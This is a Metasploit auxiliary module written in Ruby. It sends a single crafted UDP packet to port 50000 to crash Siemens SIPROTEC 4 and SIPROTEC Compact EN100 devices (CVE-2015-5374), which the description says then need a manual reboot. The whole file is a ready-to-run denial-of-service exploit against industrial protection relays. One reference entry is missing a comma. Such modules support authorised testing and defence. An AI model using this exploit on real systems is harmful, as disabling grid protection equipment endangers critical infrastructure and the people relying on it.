modules/auxiliary/dos/scada/siemens_siprotec4.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::Udp
include Msf::Auxiliary::Dos
def initialize(info = {})
super(
'Name' => 'Siemens SIPROTEC 4 and SIPROTEC Compact EN100 Ethernet Module - Denial of Service',
'Description' => %q{
This module sends a specially crafted packet to port 50000/UDP
causing a denial of service of the affected (Siemens SIPROTEC 4 and SIPROTEC Compact < V4.25) devices.
A manual reboot is required to return the device to service.
CVE-2015-5374 and a CVSS v2 base score of 7.8 have been assigned to this vulnerability.
},
'Author' => [ 'M. Can Kurnaz' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 1 $',
'References' =>
[
[ 'CVE' '2015-5374' ],
[ 'EDB', '44103' ],
[ 'URL', 'https://www.cisa.gov/uscert/ics/advisories/ICSA-15-202-01' ]
])
register_options([Opt::RPORT(50000),])
end
def run
connect_udp
pckt = "\x11\x49\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x28\x9e"
print_status('Sending DoS packet...')
udp_sock.put(pckt)
disconnect_udp
end
end